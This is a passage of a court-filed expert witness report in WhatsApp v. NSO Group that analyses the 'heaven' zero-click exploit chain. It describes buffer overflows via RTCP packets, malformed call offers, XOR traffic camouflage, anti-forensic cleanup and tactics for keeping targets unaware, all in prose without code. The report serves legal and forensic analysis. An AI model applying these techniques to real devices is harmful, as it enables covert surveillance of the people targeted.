104. Defendants' "heaven" malware also used multiple methods to carefully manipulate WhatsApp Servers and WhatsApp Client Applications running on Target Devices in order to achieve unimpeded access to and control over those devices. Defendants' Malware leveraged undocumented features of the WhatsApp call offer message to inject the malicious bash script into the Target Device's memory, as well as to enable the XOR encryption. Defendants' Malware, via the WhatsApp Servers, performed "fingerprinting" of the Target Device, which collected the user's online status, make, model, and operating systems. The fingerprinting allowed for Defendants' Malware to determine the manner in which to proceed with exploitation of the Target Device, based on extensive knowledge of the WhatsApp Client Application's internal workings which Defendants had apparently amassed. If the Target Device was determined to be vulnerable through fingerprinting, Defendants' Malware continued its actions by leveraging RTCP packets to overflow buffers on the Target Device, inserting further malicious data into the memory space used by the WhatsApp Client Application and manipulating this data, along with data natively present within the Application, to execute malicious code on the Target Device.

**Defendants' Malware Operated in a Manner Which Exceeded the Capabilities Afforded by WhatsApp to an Ordinary User**

105. It is my understanding that an ordinary user will download WhatsApp, create an account, and begin communications. This communication can include voice calls and multimedia messages, between two users or a group of users. The messages can include text or media.

106. It is my understanding that an ordinary user will typically have little to no knowledge of the WhatsApp infrastructure, let alone the intricacies of the function of a Signaling Server, Relay Server, RTP, and RTCP packets. The ordinary person will likely understand the

---

[58] NSO_WHATSAPP_00008957.

concept of encrypted communication but will unlikely understand the complexity of how to exploit end-to-end communications.

107. With the actions I discussed above, regarding the access and use of WhatsApp Servers and Target Devices, I will note for all activity, it is unreasonable for an ordinary person to have awareness of the concepts or have the technical, networking, scripting, and malicious software development skills to execute the activity. An ordinary person will unlikely understand the following technical concepts, such as the definition of a "buffer overflow," fingerprinting a device in order to inform how an exploitation is to be deployed, the concept of a malformed call offer message with manipulated settings, let alone how to create and transmit one, how to write in bash script, how to create and send modified packets to determine a device's architecture, the awareness of buffering messages and how to manipulate them to execute a buffer overflow, awareness of ASLR to determine where a WhatsApp library is held in a Target Device, and further how to perform remote code execution. Herein, it is my opinion Defendants accessed and used WhatsApp Servers and Target Devices in separate ways than an ordinary person, which includes overcoming technical limitations in the WhatsApp Client Application and WhatsApp's Servers that are beyond an expected user's activity.

## Function and Impact of Defendants' Spyware

### Defendants' Malware, Most Notably Pegasus, Operates as Spyware

108. It is my understanding that spyware involves secretly installing malicious software on a device without the knowledge of its user, which then monitors, captures, and extracts the user's activity on the device.

109. The exploit discussed in this report served as a mechanism to deliver Defendant's "zero-click" mechanism to a Target Device, which then secretly executed a malicious script onto the Target Device's memory.

110. Defendants knowingly designed their exploit to be executed without the target user's awareness. This is seen in both the fingerprinting and attack stages of the exploit, where Defendants explicitly define steps to minimize the target's awareness. In the fingerprinting stage, this is achieved by the following:[59]

- Using the same group chat name in all fingerprinting attempts of a target;
- Using the same mobile number in all fingerprint attempts of a target; and
- Avoiding using the same mobile number repeatedly when adding targets to various groups chats.

---

[59] NSO_WHATSAPP_00008960.

Docusign Envelope ID: 5E56B0BD-8069-4B97-8A24-F353D98B4824    Case 4:19-cv-07123-PJH    Document 514-2    Filed 01/09/25    Page 39 of 59

HIGHLY CONFIDENTIAL – ATTORNEYS EYES ONLY | Expert Witness Opinion of David Youssef    30

111. Similarly, Defendants aim to minimize the target's awareness during the attack stage by:[60]

- Performing fingerprinting prior to the attack to minimize the number of voice calls to the target;

- A limiting of three attack attempts per target, regardless of the reason for failure;

- Waiting roughly one minute, give or take, between each call; and

- Shifting to a "one-click" attack on the target after three failed fingerprinting attempts.

112. It is my understanding this exploit led to the installation of a final-stage payload; the Defendants do not produce evidence with which to analyze this final-stage payload's function or capabilities. However, it is reasonable to conclude this final-stage payload was likely related to Defendants' Pegasus Spyware.

113. Defendants state in NSO Group's 2023 Transparency and Responsibility Report[61] they are "most well-known for 'Pegasus,' a system used . . . to surveil and collect data from mobile devices of particular individuals suspected of engaging in terrorist or criminal activity."

114. Pegasus relies on a delivery mechanism or "installation vector" in order to infect a Target Device. This could include text messages or files sent to the Target Device, or, in this instance, a malicious WhatsApp call offer which contains capabilities for the zero-click exploitation of a software vulnerability. As discussed, zero-click installation vectors can allow for Pegasus Spyware to be installed remotely without the targeted individual's knowledge or consent, and without the need to deceive or compel the individual into performing any particular action. This is reiterated in the deposition of Yaron Shohat: "[The Pegasus technology] deploys an agent which the owner or user of the targeted device is not aware of."[62] As such, my assessment is this delivery mechanism was, and any comparable delivery mechanism would be, of use and of extremely high value to Defendants in conducting their business operations.

115. Following successful installation on a Target Device, I understand that Pegasus is marketed as, and indeed is, capable of reading and collecting various types of user information by accessing data and running processes within the Target Device. Information collected may include messages, calls, contacts, photos, location services, access to the device's camera and microphone. As stated within Exhibit 10 of the Complaint, Pegasus operates by communicating with Command and Control ("C2")

---

[60] NSO_WHATSAPP_00008961.

[61] https://www.nsogroup.com/wp-content/uploads/2023/12/2023-Transparency-and-Responsibility-Report.pdf.

[62] Shohat Dep. at 40:1-40:11.

Docusign Envelope ID: 5E56B0BD-8069-4B07-8A24-F352D98B4824    Case 4:19-cv-07123-PJH    Document 514-2    Filed 01/09/25    Page 40 of 59

HIGHLY CONFIDENTIAL – ATTORNEYS EYES ONLY | Expert Witness Opinion of David Youssef    31

servers to relay information collected from the Target Device. This process in full is intended to occur without the target individual's knowledge or ability to intervene.

116. Based on my review of the logging from Plaintiffs' servers and Defendants' backend infrastructure (AWS Server), I determined that there was an unknown C2 server that the final visible installation ("stager") communicates with. My understanding is that Defendants' spyware products, such as Pegasus, require surreptitious installation on Targeted Devices in order to collect information and disseminate it to Defendants and/or Defendants' customers. Furthermore, Defendants have admitted in the litigation that the AWS Server contained "Pegasus code, Python scripts, [and] configuration files" "for some periods prior to January 2021."[63] Given this, it is my opinion that the exploit detailed in this report likely resulted in the successful delivery of a secondary payload by Defendants, and very likely Defendants' flagship product Pegasus.

117. These functionalities surrounding the delivery, installation, and standard operation of Pegasus demonstrates why it is considered spyware and should continue to be categorized as such.

**Defendants' Malware Victimized at least 1,500 WhatsApp Target Devices**

118. Based on the evidence made available to me, Defendants executed the exploit chain against at least 1,500 Target Devices during the May 2019 timeframe in which the activity was logged by Plaintiffs.[64] Based on associated phone numbers, at least one target user appears to have resided within the United States. I cannot state definitively how many Target Devices in total may have been during the timeframe in which this vulnerability existed in WhatsApp and was known to and actively exploited by Defendants.

119. While only one apparent U.S.-based victim was documented by the Plaintiff to have been impacted, Defendants' Malware was designed to use WhatsApp's Servers to relay traffic, regardless of where the targeted user might have been located. Based on evidence I have reviewed, the attacks carried about by the Defendants' Malware actually used WhatsApp infrastructure physically located within the U.S. even in instances where the targeted user had a foreign phone number.

120. Based on my understanding of Defendants' Malware, and the exploit analyzed within this report, the impacted victims would not have realized they were impacted by this attack, nor would WhatsApp's Servers have detected that the messages sent as part of the exploit chain were not sent by a legitimate WhatsApp Client. Given the sophistication of the

---

[63] Declaration of Chaim Gelfand in Supp. of Defs' Opp. to Mot. to Compel Discovery Regarding AWS Server ¶ 6-8 (July 12, 2024) (Dkt. No. 339-1).
[64] WA-NSO-00017582.

Docusign Envelope ID: 5E56B0BD-3069-4B97-8A24-F352D98B4824 Case 4:19-cv-07123-PJH Document 514-2 Filed 01/09/25 Page 41 of 59

HIGHLY CONFIDENTIAL – ATTORNEYS EYES ONLY | Expert Witness Opinion of David Youssef 32

exploit, and the use of the WhatsApp Signaling and Relay Server, the victims in this instance would have likely believed they were receiving a legitimate incoming communication via WhatsApp.

**Defendants' Malware Obtained Information from WhatsApp Servers and Target Devices**

121. Regarding the steps mentioned above, it is my opinion that Defendants would have had to develop and test their exploit using WhatsApp Servers and the WhatsApp Client Application. Further, WhatsApp network infrastructure was identified in enough detail to learn the locations of specific Signal and Relay Servers utilized by WhatsApp. This knowledge allowed Defendants' Malware to be deployed onto specific Target Devices for the purposes of extracting data from the Target Device and surveilling its user without the user's awareness.

122. Through the fingerprinting and architecture identification mechanisms of "heaven," Defendants were able to collect information about the Target Devices, including hardware details, installed versions of the WhatsApp Client Application, and the targeted users' activity status within WhatsApp. I note Defendants obtained information about Target Devices through the WhatsApp Servers which was not intended by Plaintiffs to be disclosed by the servers to other users.

123. Defendants' "heaven" malware accessed the Target Device's memory and used information gathered in that manner to identify the position of memory space used by libwhatsapp.so on the Target Device. This position is not intended to be disclosed outside of the WhatsApp Client Application, to any other user, or even to the legitimate user of the Client Application due to its sensitivity; indeed, this information was instrumental to "heaven" in carrying out the subsequent steps of the exploit chain.

124. As previously discussed, Defendants' Pegasus Spyware is designed to covertly install on a Target Device for the purpose of monitoring and collecting sensitive information from the device. I was not provided with copies of Pegasus or other variants of spyware developed by Defendants, which limited my ability to assess the full impact of Defendants' Malware on Target Devices and the WhatsApp Client Applications. However, my opinion is that the exploit and associated malware discussed by this report served as a delivery mechanism for Pegasus and/or other variants of Defendants' Malware, given that the evidence I have reviewed demonstrates that the WhatsApp Servers and Target Devices were specifically targeted by the exploit as the vector for delivery of a final-stage malicious payload.

125. Given Defendants' acknowledged business in the development and marketing of malware, I assess that, as a result of the observed exploitation activity, a final-stage payload such as Pegasus would have enabled Defendants and/or their customers to

Docusign Envelope ID: 5E56B0BD-8069-4B07-8A24-F352D98B4824    Case 4:19-cv-07123-PJH    Document 514-2    Filed 01/09/25    Page 42 of 59

HIGHLY CONFIDENTIAL – ATTORNEYS EYES ONLY | Expert Witness Opinion of David Youssef    33

monitor and collect information from Target Devices.[65] Defendants' business model entails the delivery and installation of malware they have engineered for the purposes of remotely monitoring their specified targets. As mentioned above, Defendants go to great lengths to reliably deploy their exploit payloads and to obfuscate or destroy evidence of this intrusion. Thus, it is my opinion that Defendants and/or their customers did leverage this exploit to target specific WhatsApp end users with the end goal of surreptitiously collecting information from these users' devices, including their WhatsApp communications.

## Evading Detection

**Concealment of Defendants' Malware**

126. Defendants' "heaven" malware was designed to interact with WhatsApp Servers and targeted WhatsApp Client Applications by creating messages which appeared to be from a legitimate WhatsApp Client. During this process, "heaven" imitated characteristics of transmissions generated by the genuine WhatsApp Client, and used credentials and keys derived from authentic WhatsApp user accounts. Defendants' "heaven" malware took steps to conceal the malformed and malicious nature of its communications from Plaintiff's official WhatsApp Servers and targeted WhatsApp Clients.

127. Defendants engineered their Malware to conceal its access to and use of WhatsApp Servers and Target Devices. Defendants' Malware interacted with WhatsApp Servers as well as with the WhatsApp Client installed on Target Devices by creating messages that appeared to be from a legitimate WhatsApp Client Application. During this process, Defendants' engineered malware, which in my opinion should be considered spyware, reproduced transmission properties of the WhatsApp Client Application, and used credentials and keys retrieved from authentic WhatsApp user applications. This activity was used to disguise Defendants' Malware as a valid WhatsApp user application in order to access and use both WhatsApp's Servers and the Target Devices. As described in this process, Defendants' Malware deceived WhatsApp Servers and Target Devices' WhatsApp Client Applications about the type of and the source of the transmission between Defendants' Malware and those devices.

128. Defendants at various points leveraged XOR encryption to obfuscate the data transmitted by their Malware to targeted devices by way of the WhatsApp Relay Servers. This technique served to mask the malicious nature of certain RTCP packets crafted and transmitted by Defendants. Defendants' Malware used the RTCP packet header, which normally contains transportation information for the packet, as a key with which to

---

[65] Compl. Ex. 10, Dkt. No. 1.

enable encryption. The resultant packets resembled RTCP_REMB packets, which are used by the legitimate WhatsApp systems to control media congestion by indicating the rate at which media can be sent. The XOR encryption ultimately served to "camouflage" the appearance of Defendants' packets among normal network traffic, limiting the probability of detection by WhatsApp engineers and/or security mechanisms.

129. Upon exploiting the buffer overflow vulnerability, Defendants' Malware took discernible and deliberate actions to "clean up" evidence of exploitation which may have remained on the Targeted Devices. The first callback pointer overwritten by "heaven" pointed to a regular function of the WhatsApp application which organized and resets certain parts of the process' memory. This function removed information from the memory of the Target Device as well as data related to Defendants' Malware activity, which may have been indicative of Defendants' Malware's previous behavior. After resetting these portions of memory space, the affected system would have appeared closer to the baseline of a running WhatsApp application.

130. Each of the executable files which were written to the disk by Defendants' various exploit payloads were erased after completing their functions. In addition, based upon my study of the full exploit chain, it appears that Defendants' final-stage payload was intended to be loaded directly into executable memory rather than written to the device's storage. This is a common technique used by cyber threat actors to evade detection and inhibit efforts by incident responders or forensic analysts to identify and analyze their malicious software.

**Defendants' Malware Altered, Damaged, or Deleted Data from WhatsApp Servers and Target Devices**

131. While executing the buffer overflow exploits, Defendants were inherently altering or damaging targeted WhatsApp Client Applications. As demonstrated in previous sections, the buffer overflow altered and corrupted memory on Target Devices, causing them to behave in ways not designed or intended by Plaintiffs when developing the Applications.

132. Further, when Defendants' malicious code was executed against Target Devices, this triggered other actions which reset the Target Device's memory, deleted temporary files, and downloaded a second-stage payload to complete the compromise of the Target Device.

## Defendants' Malware Development and Circumvention

**Defendants' Reverse Engineered and Tested the Design of its Software to Work Against WhatsApp Infrastructure**

133. I have not received or reviewed Defendants' financials or any other materials directly related to the organization of Defendants' business. However, based on the evidence at hand, including the deposition of the NSO's CEO, my expert opinion is that while the stated core of Defendants' business is in developing and marketing the Pegasus Spyware, Defendants' business is in large part dedicated to the discovery and weaponization of zero-day software exploits with which to deliver their Malware. I assess that Defendants maintain and invest massively in an in-house exploit research and development apparatus, and that the "heaven" exploit chain and associated software discussed here is a product of that apparatus.

134. The legitimate WhatsApp Client Application does not provide users with the functionality necessary to activate the XOR cipher setting, nor to set the value of the "connecting_tone_desc" field within the call offer message, nor to add freeform text to that field. The manipulated offer message prepared during step two of the exploit chain therefore had to have been prepared and sent using a modified or fake WhatsApp client, i.e., a program intended to emulate a WhatsApp Client Application from the perspective of the WhatsApp Servers, in order to circumvent the technological limitations of the legitimate WhatsApp Client Application. My understanding is that Defendants' "heaven" malware and/or its associated "WIS" component did in fact serve in part to emulate a genuine WhatsApp Client Application in order to carry out the attacks.

135. The buffer overflow vulnerability at the center of the exploit chain would have required a significant amount of time and effort dedicated to testing in order to be discovered and leveraged to achieve arbitrary code execution against the targeted device. Achieving arbitrary code execution through a buffer overflow attack against modern systems and applications requires a great deal of precision, as corrupting the wrong pieces of data in the targeted system's memory is likely to result in an application or system crash.

136. The exploit chain demonstrates that Defendants possessed a detailed understanding of the memory layout of the WhatsApp Client Application for Android, and particularly of its library component libwhatsapp.so. Defendants maintained knowledge of the memory offsets for various pieces of data and functions within libwhatsapp.so applicable to each of multiple different versions of the WhatsApp Client Application and two underlying device architectures (32-bit and 64-bit). These memory offsets were essential to Defendants in their carrying out of the exploitation against WhatsApp users, as without an intimate understanding of the memory layout, the buffer overflow vulnerability could not feasibly have been made to execute malicious code. This type of information is not publicly documented by Plaintiffs, and in my opinion could only have been derived from Defendants' methodical reverse engineering of each relevant version of the WhatsApp Client Application.

137. The "heaven" malware's interactions with WhatsApp's Signaling Servers and Relay Servers demonstrate that Defendants possessed a detailed understanding of WhatsApp's proprietary VoIP architecture and infrastructure, to include knowledge of multiple unused and undocumented features. Plaintiffs generally do not publicize detailed information about their proprietary VoIP architecture, and in my opinion this level of understanding could only have been achieved by intercepting and decrypting network traffic from a genuine WhatsApp Client Application in order to analyze its interactions with the WhatsApp Server-side infrastructure.

138. Furthermore, based on my review of the computer scripts and logs which I was provided from the Defendants' AWS Server, my understanding is that "heaven" is a sophisticated suite of malware designed for the express purpose of carrying out attacks against WhatsApp users and infrastructure reliably, efficiently, and stealthily. I assess that a significant amount of resources were invested by Defendants in developing this malware such that the relevant exploitation could be conducted repeatedly and consistently, and such that the relevant vulnerability would remain unnoticed by Plaintiffs for as long as possible.

139. The exploit discussed within this report is complex and sophisticated by nature and would require a non-public understanding of how WhatsApp Servers and Client Applications operate to ensure successful execution. The exploit leveraged specific vectors of attack and utilized specific Relay Servers within the United States in order to execute successfully. Certain vectors were closed, based on change management logs from Plaintiffs, which potentially inhibited Defendants' activities and required them to circumvent such updates to ensure the success of the exploit.

140. As detailed earlier in the report, the logs which I reviewed from Defendants' AWS Server also demonstrate multiple exploitation attempts being carried out by the "heaven" prior to its identification by Plaintiffs in May 2019.

141. While I have not had an opportunity to analyze the documents produced by Defendants, I have reviewed certain documentation produced by Defendants that provide specific details on how to successfully operate the "heaven" exploit on WhatsApp services. This demonstrated their intricate knowledge of the WhatsApp architecture and specific areas to ensure successful execution of the exploit.

**Defendants' Access to the IP Addresses for WhatsApp's Servers; Location Attribution**

142. Plaintiffs' businesses are operationally headquartered in Menlo Park, California. It is commonly known that Plaintiffs are based within the "Silicon Valley" region of the Northern District of California.

Docusign Envelope ID: 5E56B0BD-8069-4B07-8A24-E352D98B4824
Case 4:19-cv-07123-PJH    Document 514-2    Filed 01/09/25    Page 46 of 59

HIGHLY CONFIDENTIAL – ATTORNEYS EYES ONLY | Expert Witness Opinion of David Youssef   37

143. Log files from Defendants' AWS Server indicate that Defendants designed their Malware to access and use Plaintiffs' infrastructure based in the United States. Defendants' Malware contains hard-coded WhatsApp domain names associated with WhatsApp's Signaling Servers, and I understand that in 2019, all of WhatsApp's Signaling Servers were located at U.S. data centers.[66] Furthermore, during the ordinary operation of a VoIP call on WhatsApp, the Signaling Servers provide IP addresses for a few potential Relay Server options to the WhatsApp Client, which then selects which to use.[67]

144. Because Defendants were not using the genuine WhatsApp Client Application, and I have been provided with an incomplete version of Defendants' Malware; I am unable to reach any opinion about whether or how Defendants intentionally selected those Relay Servers. However, the WhatsApp Relay Servers selected and used by Defendants' Malware are logged by their IP addresses in the logs from the AWS Server, of which I identified four which appear to be registered to Plaintiffs and based in the United States according to the American Registry for Internet Numbers.[68] [69] Each of these IP addresses was accessed via TCP and/or UDP ports 3478, which is used by the STUN protocol, a component of WhatsApp's VoIP infrastructure. In addition, Plaintiffs' logs demonstrate that the exploits they observed utilized several U.S. based Relay Servers, including servers located in San Jose and Los Angeles, California.[70] [71] Out of the 173 servers located within the US, 43 California were listed as a part of this exploit.[72]

**Changes to the WhatsApp Infrastructure Interrupted Defendants' Malware Prior to May 2019**

145. Based on my review of WhatsApp diff[73] D9650871, which was published on September 3, 2018, updates were instituted into the code to add a check for stanzas containing the VoIP settings element. The update would check for stanzas sent by clients that contained VoIP settings and block any stanza that was deemed invalid while logging this information, preventing any malformed or invalid stanza from being accepted by the Signaling Server.

---

[66] Gheorghe Dep. at 184:20-185:9.

[67] Gheorghe Dep. at 206:8-208:7; 246:16-249:11.

[68] https://search.arin.net/rdap/?query=157.240.0.0%2F16.

[69] https://search.arin.net/rdap/?query=179.60.192.48.

[70] WA-NSO-00166473.

[71] Gheorghe Dep. at 206:8-19.

[72] WA-NSO-00166473.

[73] In software development, a "diff" (from shorthand for "difference") refers to a line-by-line comparison of a code sample before and after an update was made.

Docusign Envelope ID: 5E56B0BD-8069-4B07-8A24-F852D98B4824    Case 4:19-cv-07123-PJH    Document 514-2    Filed 01/09/25    Page 47 of 59

HIGHLY CONFIDENTIAL – ATTORNEYS EYES ONLY | Expert Witness Opinion of David Youssef    38

146. I reviewed the internal Task – T33535414[74] filed on September 3, 2018, which details an identified issue, allowing a WhatsApp Client Application to generate and send "voip_settings" values in signaling messages via group calls. It is my understanding that this issue was initially identified by an external security researcher and brought to Plaintiffs' attention for remediation. The Task mentioned a diff, D13309896, which, as I understand it, is in response to this identified issue.

147. I also reviewed diff D13309896, which was published on December 3, 2018, a further update was added into the WhatsApp application code to additionally check for stanza's with "group update" in VoIP settings. In this instance, a call was created, where a "group update" was being initiated by the WhatsApp Client Application. This function should only originate from a WhatsApp server. When a "group update" was created by the WhatsApp Client Application, the group update would be followed with a forbidden error. The update that followed would reject stanzas with group updates sent from the WhatsApp Client Application. Review of the subsequent logs from the AWS Server following the publishing of both of these code changes demonstrated that on December 5, 2018, there were call offers received that resulted in a "403" error code. As I understand it, the "403" error code is an internally defined code at WhatsApp, meaning the call offer in this case, is forbidden. My understanding of the "403" error code is that it is thrown from the server side of the exchange when a WhatsApp Client Application is performing an action that the server has deemed inappropriate or is not expected, in this instance, sending "voip_settings" in signaling messages (i.e., call offers). Following the deployment of diff D13309896, Task -T33535414 also has communications that detailing that an external security researcher performed a test and confirmed that the diff fixed the issue that they identified.

148. Based on my review of these diffs and corresponding log records from NSO's AWS Server, and my understanding of the Task, it is my opinion that Defendants were potentially testing their exploit on WhatsApp infrastructure in 2018. It is my opinion that in order for the 2019 attack described in Plaintiffs' complaint to work, Defendants would have needed to research and develop a solution to bypass the security measures implemented by WhatsApp.

149. Based on the availability of the aforementioned diffs and associated Task, and subsequent logs from the AWS Server, it is my understanding that the updates and changes made to the WhatsApp Servers and WhatsApp Client Applications would have restricted or

---

[74] Tasks is an internal ticketing system utilized by Plaintiffs to track and discuss remediation activities (WA-NSO-00166464).

Docusign Envelope ID: 5E56B0BD-8069-4B07-8A24-F353D98B4824    Case 4:19-cv-07123-PJH    Document 514-2    Filed 01/09/25    Page 48 of 59

HIGHLY CONFIDENTIAL – ATTORNEYS EYES ONLY | Expert Witness Opinion of David Youssef    39

interrupted certain operations of Defendants' Malware prior to the exploit that Plaintiffs identified in May 2019.

## Defendants' Continued Actions Following Plaintiffs' Remediation

### Defendants Continued to Attempt Exploitation After Plaintiffs' May 2019 Remediation

150. I understand based on the evidence made available for my review that on May 10, 2019, Plaintiffs implemented specific remediations to address the vulnerability and to prevent further propagation of Defendant's Malware via WhatsApp infrastructure. These remediations included software patches applied to the WhatsApp Signaling such that they would reject offer messages which did not conform to the predetermined data structures.[75] This resulted in the Signaling Servers rejecting any malformed or manipulated offer messages, thereby preventing the "heaven" malware from continuing to operate. Plaintiffs also released an updated version of the WhatsApp Client Application to end users on May 13, 2019, which eliminated the buffer overflow vulnerability which was leveraged during Defendants' exploitation activity.[76]

151. Following remediation of the vulnerability, I understand that Plaintiff's security engineers identified new malformed messages which originated, in at least some instances, from attacker accounts utilized by Defendants during the May 2019 exploit. It is my understanding, based on review of the associated security ticket or "SEV,"[77] that Plaintiffs took additional remediation actions in November 2019 to prevent potential new exploits.[78]

152. A review of the SEV S182393[79] revealed suspicious activity was observed when a number of malformed messages were sent from the same attacker accounts or IP addresses identified during the May 2019 exploit to suspected test devices. The exploit developer was causing the Target Device to download a media file from the exploit developer servers. In an attempt to block this activity, two issues were mitigated. The first issue was a stanza that caused a client's message counter to be reset. When this action occurred a spoofed message could be sent from the attacker to a client which was believed to have

---

[75] Gheorghe Dep. at 270:21-271:8, 273:12-274:21.

[76] Gheorghe Dep. at 271:9-20, 272:13-21.

[77] I understand that a "SEV" is a type of ticket used internally by Plaintiffs to track and respond to identified issues specifically related to security.

[78] SEV S182393 was produced by WhatsApp and titled "Suspicious iq stanzas." This documents the activity, which was detected and investigated, and some potentially associated issues which were later remediated.

[79] WA-NSO-00192765.

been originated from a WhatsApp Server, since the message counter was successfully brute forced. These two issues were both remediated.

153. Despite continued monitoring and active remediation efforts, it is my opinion that Defendants are likely to continue to target WhatsApp in the future. As I have discussed earlier within this report, Defendants' business model requires them to continuously identify new software vulnerabilities, particularly zero-day vulnerabilities, with which to maintain uninterrupted capabilities for the delivery of their Malware to Target Devices.

154. The activity observed by Plaintiffs after May 2019 is consistent with some of the scripts from Defendants' AWS Server which I have reviewed; this indicates that Defendants attempted to either salvage or repurpose aspects of the "heaven" exploit, to utilize additional exploits that Plaintiffs had not yet discovered, or to develop a new exploit for WhatsApp following the closure of their "heaven" attack vector. Furthermore, I assess that Defendants' development of workarounds for WhatsApp's remediations in 2018 prior to the May 2019 exploit also demonstrates Defendants' persistence, intent, and ability to circumvent WhatsApp's security mechanisms.

155. Given the worldwide popularity of WhatsApp and its security features that attract a multitude of groups, it is my opinion that WhatsApp is a natural target for Defendants, given their business model, and in the absence of a significant deterrent, Defendants are likely to continue targeting, researching, and developing exploits for WhatsApp Servers and clients.

## CONCLUSION

156. Based on the evidence available to me that I have had a reasonable opportunity to analyze as of the date of this report, including evidence provided by Plaintiffs, evidence provided by Defendants, and evidence provided to Counsel by DOJ, I have reached the conclusion that Defendants accessed, modified, and exploited, without authorization from Plaintiffs, Plaintiffs' software and infrastructure in May 2019. I have further concluded that Defendants continuously worked to circumvent any technical measures implemented by Plaintiffs in order to maintain access to Plaintiffs' servers and Target Devices for the purpose of deploying spyware.

157. I concluded that Defendants' Malware exploited and accessed Plaintiffs' architecture and subsequently the Target Devices.

158. I concluded that Defendants' Malware is spyware, in that it was implemented to collect information from Target Devices without the Target Devices' users' awareness, and was used to deliver an additional malicious payload which I assess was likely Defendants' Pegasus Spyware product.

159. I concluded that Defendants' Malware was designed to evade detection by Plaintiffs and was designed over time to adapt to changes and updates in Plaintiffs' infrastructure, including technical measures specifically intended to prevent such activity. I determined that Defendants' exploitation was, in fact, successful due to an optimization, or update, in Android Target Devices, which allowed Defendants to manipulate communications and deliver the exploitation.

160. I concluded that Defendants conducted extensive reverse engineering of Plaintiffs' software and infrastructure in order to develop more effective malware.

161. Finally, I came to the conclusion that at least 1,500 Target Devices users appeared to have been targeted, exploited, and impacted by Defendants' Malware during the specific timeframe, making them victims to Defendants' Malware through Defendants' unauthorize access of and use of Plaintiffs' servers. Further, based on Defendants' business model, I have no reason to suspect Defendants stopped this activity after May 2019.

Dated: August 30, 2024

David Youssef

## APPENDIX A: CURRICULUM VITAE

At FTI Consulting, Mr. Youssef provides cybersecurity expertise in a broad range of matters involving litigation support and complex investigations, breach response, data privacy, online advertising and tracking technology, crisis management, botnet takedowns, advanced cybersecurity assessments, source code review, cyber-regulatory compliance, and advanced threat detection and prevention. Currently, Mr. Youssef leads North America's incident response efforts and serves as a computer scientist and technology subject matter expert. In this capacity, he guides teams of experts in tackling complex cyber threats, evaluating data privacy and risk, and offering specialized assistance in areas such as sophisticated cyber breaches, global botnets utilizing diverse distribution methods like the online advertising ecosystem, and litigation support pertaining to data privacy issues like advertising trackers and other third-party risks.

Prior to joining FTI Consulting, Mr. Youssef served as Vice President and Global Lead of the Integrated Cyber Threat Analysis Team at Citigroup's Cyber Security Fusion Center. There, he coordinated Citi's intelligence-led, threat-focused approach to incident avoidance and risk reduction. Mr. Youssef was the lead coordinator of response efforts during critical cyber events and crises, orchestrating evidence collection, intelligence integration, and mitigation efforts among Fusion Center teams. In addition, he spearheaded the creation of an interdisciplinary Advanced Persistent Threat hunt capability that focused on proactively defending and protecting against advanced malware distributed by sophisticated nation state and cyber-criminal groups.

Before his role at Citi's Fusion Center, Mr. Youssef served as Assistant Vice President for Citi Security and Investigative Services, responding to global cyber incidents, and specializing in digital forensics, electronic crimes, and malware analysis. He actively engaged in liaison activities with various US-based and international law enforcement and government agencies to best understand emerging cyber threats, and he aided in the disruption of several malware botnets cyber-criminal rings.

Mr. Youssef was an Adjunct Professor of Cybersecurity at Fordham University where he taught various graduate and undergraduate courses on topics including incident response, digital forensics, network security, penetration testing, and critical infrastructure.

Also at Fordham, Mr. Youssef served on the organizing committee of the International Conference on Cyber Security (ICCS), an annual summit held in partnership with the Federal Bureau of Investigation in which experts from the government, the private sector, and academia gather to share critical intelligence on issues shaping the future of cybersecurity.

## Expert Retention

*United States District Court Southern District of New York (1:23-cv-02219). Google LLC, Plaintiff, v. Zubair Saeed; Raheel Arshad; Mohammad Rasheed Siddiqui; and Does 1-15, Defendants. (S.D.N.Y. Apr. 21, 2023)*

*United States District Court Southern District of New York (23-cv-03369). John Collins, on behalf of himself and all others similarly situated, Plaintiff, v. Pearson Education, Inc.*

## APPENDIX B: ABOUT FTI CONSULTING CYBERSECURITY

Everyday cybersecurity threats bring challenges to your organization. Addressing these challenges requires more than deploying commercial tools or off-the-shelf software. Success demands original, innovative solutions that are tailored to fit your needs – the kind of solutions that FTI Cybersecurity experts deliver for clients daily. Solutions that can instill confidence in your organization's cybersecurity posture, enabling you to manage risk while achieving your overall business goals. Our team can create custom scalable solutions designed to address and combat these threats proactively, while effectively and efficiently maintaining your day-to-day business operations and reputation. Working together, FTI can build your organization's cybersecurity capabilities from threat detection and incident response to risk assessment and security awareness.

### Expertise

FTI Consulting's cybersecurity business is engineered to synthesize cutting-edge, intelligence-led capabilities around a trusted core of comprehensive offerings. This enables clients of any size to address their most critical needs and integrate new solutions atop or alongside pre-existing policies and programs to address cyber threats. We build a safer future by helping organizations understand their own environments, harden their defenses, rapidly and precisely hunt threats, holistically respond to crises, and sustainably recover their operations and reputation after an incident. Our seasoned experts bring deep technical and practical experience to the delivery of these solutions. Our industry experience across forensic investigations, strategic communications, expert testimony, and managed network defense operations, empowers FTI Consulting to meet a full range of technical needs across the globe.

### Experience

At FTI, we apply our unique insight, developed through decades of experience investigating sophisticated cyber incidents, to help clients respond to incidents and enhance their information security systems. We are thoroughly familiar with the current threat environment, and have a deep understanding of the tools, techniques, and protocols attackers use to target your computer network infrastructure. At the same time, we have an appreciation for the technical, organizational, policy and business challenges that companies must address to identify, react to, and mitigate attacks. We use our unrivaled experience and track record of innovative thinking to provide solutions that are holistic in philosophy, practical in application and sensitive to businesses' operational concerns.

### Qualifications

FTI's Cybersecurity consists of 300+ dedicated incident response and cybersecurity consultants, led by those with decades of experience at the highest levels of law enforcement, intelligence

and global private sector institutions. Our team works closely with clients to ensure their cybersecurity approach is consistent with regulatory guidance and represents best practice.

## Industries

Collectively, our cybersecurity team professionals have backgrounds in:

- Law Enforcement
- National and International Security
- Finance
- Policy and Public Affairs
- Fraud Detection
- Incident Response
- Crisis Management and Disaster Recovery
- Strategic Communications
- Forensics and Litigation
- Academia and Training

## Credentials

Certifications held by our professionals include:

- Certified Information System Security Professional (CISSP)
- Certified Information Privacy Professional (CIPP/US)
- Certified Information Security Manager (CISM)
- Certified Information Systems Auditor (CISA)
- Global Information Assurance Certification Certified Incident Handler (GCIH)
- Global Information Assurance Certification Certified Enterprise Defender (GCED)
- Global Information Assurance Certification Security Essentials (GSEC)
- Magnet Certified Forensics Examiner (MCFE)
- Certified Ethical Hacker (CEH)
- CompTIA Security+
- Project Management Professional (PMP)

# APPENDIX C: MATERIALS CONSIDERED

**DEPOSITIONS**

Declaration of Chaim Gelfand in Support of Defendants' Opposition to Motions to Compel Discovery Regarding AWS Server ¶ 6-8 (Dkt. No. 339-1) (July 12, 2024).

